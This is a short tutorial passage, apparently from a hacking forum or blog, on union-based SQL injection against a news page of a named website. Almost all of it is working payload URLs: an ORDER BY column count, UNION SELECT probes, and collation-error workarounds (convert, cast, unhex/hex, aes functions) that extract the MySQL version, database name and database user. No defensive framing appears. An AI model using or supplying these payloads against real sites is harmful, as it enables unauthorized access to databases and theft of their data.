Immediately started counting the columns:
Code:
http://www.2cto.com /news_dett.php?id=30+ORDER+BY+9--
column 9 we have the error "SQL Error : Unknown column '9' in 'order clause" then the columns are 8 :)
Proceed with a union based injection:
Code:
http://www.2cto.com /news_dett.php?id=-30+UNION+SELECT+1,2,3,4,5,6,7,8--
in our case the columns 1,6,7,8 are vulnerable
Proceed trying to find the version of MySQL:
Code:
http://www.2cto.com /news_dett.php?id=-30+UNION+SELECT+1,2,3,4,5,version( ),7,8--
At this point our error appears
Code:
SQL Error : Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
There are 3 ways to bypass this error:
convert(version() using latin1)
aes_decrypt(aes_encrypt(version(),1),1)
unhex(hex(@@version))
Other ways (Thanks to benzi):
cast(version()+as+binary)
convert(version(),binary)
convert(version()+using+binary)
see examples:
Version:
Code:
http://www.2cto.com /news_dett.php?id=-30+UNION+SELECT+1,2,3,4,5,convert(version( ) using latin1) ,7,8--
Database:
Code:
http://www.2cto.com /news_dett.php?id=-30+UNION+SELECT+1,2,3,4,5,convert(database( ) using latin1) ,7,8--
User:
Code:
http://www.2cto.com /news_dett.php?id=-30+UNION+SELECT+1,2,3,4,5,convert(user( ) using latin1) ,7,8--
from:http://hi.baidu.com/evilrapper/blog/item/98c3b2d1537991cc572c849c.html